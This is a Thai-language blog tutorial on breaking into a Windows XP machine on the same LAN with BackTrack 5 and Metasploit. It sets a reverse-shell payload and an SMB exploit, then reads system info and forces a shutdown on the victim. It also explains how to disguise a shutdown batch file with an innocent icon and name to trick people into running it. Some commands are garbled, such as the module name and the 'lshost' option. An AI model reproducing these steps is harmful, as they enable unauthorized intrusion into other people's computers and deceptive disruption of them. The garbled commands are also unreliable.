วิธี hack windows xp ด้วย backtrack 5







วิธี hack windows xp ด้วย backtrack 5 นั้นมีไว้เป็น กรณีศึกษาเท่านั้นนะครับ ห้ามนำไปแกล้งคนอื่นโดยเด็ดขาด เพราะคนที่มีความรู้เรื่องเกี่ยวกับ backtrack 5 อาจจะไม่ได้มีคุณแค่คนเดียว ถ้าคุณนำความรู้ตรงนี้ไปแกล้งคนอื่นโดยทางมิชอบ เครื่องของคุณอาจถูกโจมตีกลับได้ ถ้าคุณไม่มีความชำนาญด้านการป้องกันการโจมตี 

                                            นี้เป็นหน้าแรกของ backtrack 5


1.เปิดหน้าต่าง command backtrack 5 ขั้นมา แล้วพิมพ์ ifconfig เพื่อดู ip เครื่องเราก่อน



ก่อนที่เราจะ hack ใครเราจะต้องรู้ ip เครื่องที่อยู่ในเครือข่ายเดียวกันก่อนนะครับ โดยเฉพาะ ถ้าอยู่ในวง Lan เดียวกันจะได้ผลดีมากเลยครับ ผมทดสอบแล้ว

                     นี้เป็นหน้าจอที่แสดง ip ของเครื่องที่ต้องการ hack นะครับ

2.เปิดหน้าต่าง command backtrack 5 ขั้นมา แล้วพิมพ์ msfconsole เสร็จมันจะรันหน้าหน้าแปลกๆ ออกมาคร่าวนี้ เราพิมพ์ต่อจาก คำว่า "msf >" set payload windows/shell/reverse_tcp


3.พิมพ์ต่อ use exploit/windows/smb/ms08_068_metapi และต่อด้วย set lshost 192.168.19.129 (ip เครื่องเยื่อยนะครับ) ต่อด้วย set rhost 192.168.1.128 (ip ไกลเคียงกันครับ) สั่งเกตดูให้ดีว่ามันจะต่างกันอยู่แค่นิดเดี่ยว  ( lhost กับ rhost ) แล้วจบท้ายด้วย พิมพ์ exploit




4.มันเจาะเข้าเครื่องได้แล้ว ลองเช็ครายละเอียดดู โดยพิมพ์ systeminfo

ตรงนี้เราสามารถเช็คดูข้อมูลอะไรก็ได้ เกี่ยวกับสเปกเครื่อง โดยที่เราไม่ต้องเดินไปถามเค้าเลยว่า สเปกเครื่องของคุณขนาดไหน


5.ลองสั่งปิดเครื่องดูครับ โดยพิมพ์คำสั่ง shutdown -s -c "คำพูดอะไรก็ได้ตรงนี้" แล้วกด Eenter ได้เลยครับ 


หลังจากเราออกคำสั่งไปแล้วมันก็จะ ran ระบบ แล้วที่หน้าจอเครื่องที่เยื่อย ที่เราออกคำสั่ง shutdown มันจะแสดงเวลาปิดเครื่อง พร้อมนับถอยหลัง และดับเครื่องไปทันทีโดยไม่สามารถกด กากบาทอะไรออกได้เลย

วิธีแก้คำสั่ง shutdown ที่ถูกสั่งจากเครื่องอื่น

คำสั่งที่ใช้ใน cmd สามารถเขียนลง Notepad และนำไปใช้ได้เมื่อกล่าวถึงการใช้ประโยชน์แล้ว ผมจะพูดถึงการนำไปใช้ในทางที่ผิด หรือจากผู้ที่ชอบแกล้งชาว ผมเคยบอกว่าคำสั่ง shutdown มันสามารเขียนลง Notepad ได้ มันสามารถใช้งานได้จริงด้วย 
ด้วยวิธีการที่ save ผ่าน notepad แล้วเปลี่ยนสกุลไฟล์จาก .txt เป็น .bat หรือ .cmd หลังจากได้ save ไฟล์ เพียงแค่คุณกด Double Click ไฟล์ที่ saveไว้นั้น คำสั่งที่คุณได้เขียนเอาไว้ หรือถูกเขียนเอาไว้โดยคนอื่น มันจะทำงานทันที
การพิมพ์คำสั่ง shutdown -s -t 10 ใส่ใน Notepad แล้ว save เป็นสกุล .bat หลังจากนั้นก็แต่งเติมให้มันไม่ดูน่าสงสัย เช่น การเปลี่ยน icon ให้เป็นรูปรร่างต่างๆ และเปลี่ยนชื่อ icon ให้เนียนหน่อย แค่นี้ก็สามารถหลอกให้ผู้อื่นโหลดไปใช้ด้วยวิธีอื่นๆ จนกระทั่งสร้างเป็นไวรัสที่ก่อกวนผู้อื่นหรือที่ชอบเรียกกันว่าไวรัส shutdown เครื่อง ซึ่งบางคนถึงขั้นยกคอมไปซ่อมกันเลยทีเดียวแถมเสียตางอีกต่างหาก
 และที่สำคัญที่สุดหลายๆคนไม่รู้ว่ามันยกเลิกคำสั่ง shutdown ได้ โดยคำสั่งที่ใช้ยกเลิกคือ shutdown -a (แต่ถ้าคำสั่งโดนตั้งเวลา 10 วินาที ก็คงไม่ทัน ) ดังนั้นเพื่อการแก้ปัญหา เปิด cmd พิมพ์คำสั่งยกเลิกคงไม่ทันไม่ทันแน่นอน 
ก็ให้ใช้วิธีเขียนลง Notepad แล้ว save เป็น .bat .cmd เซฟไว้หน้า desktop ก็ได้ครับ (แต่มันไม่ใช่การแก้ปัญหาเรื่องไวรัส shutdown โดยตรง แค่ไม่ให้มันมาขัดจังหวะเราในขณะที่กำลังพิมพ์งาน หรือทำงานอื่นๆอยู่เท่านั้นเอง)



 
Tianmiza


( Last update on 2013-05-25 )

 Artticle |  Email |  Facebook

200 : 340